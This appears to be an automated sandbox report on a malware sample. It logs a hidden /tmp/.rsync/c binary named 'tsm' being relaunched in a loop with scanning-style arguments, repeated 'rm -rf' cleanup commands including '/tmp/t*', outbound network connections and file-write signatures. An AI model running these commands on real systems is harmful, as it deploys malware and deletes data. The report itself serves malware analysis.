/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.19:443 | tcp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-28 12:54
Reported
2024-06-28 12:58
Platform
debian9-armhf-20240418-en
Max time kernel
148s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
| File opened for modification | /tmp/.rsync/c/v | /usr/bin/touch | N/A |
Processes
/tmp/.rsync/c/go
[/tmp/.rsync/c/go]
/bin/uname
[uname -m]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/bin/sleep
[sleep 3]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf .out]
/bin/rm
[rm -rf /tmp/t*]
/usr/bin/touch
[touch v]
/bin/rm
[rm -rf p]
/bin/rm
[rm -rf ip]
/bin/rm
[rm -rf xtr*]
/bin/rm
[rm -rf a a.*]
/bin/rm
[rm -rf b b.*]
/usr/bin/timeout
[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]
/tmp/.rsync/c/tsm
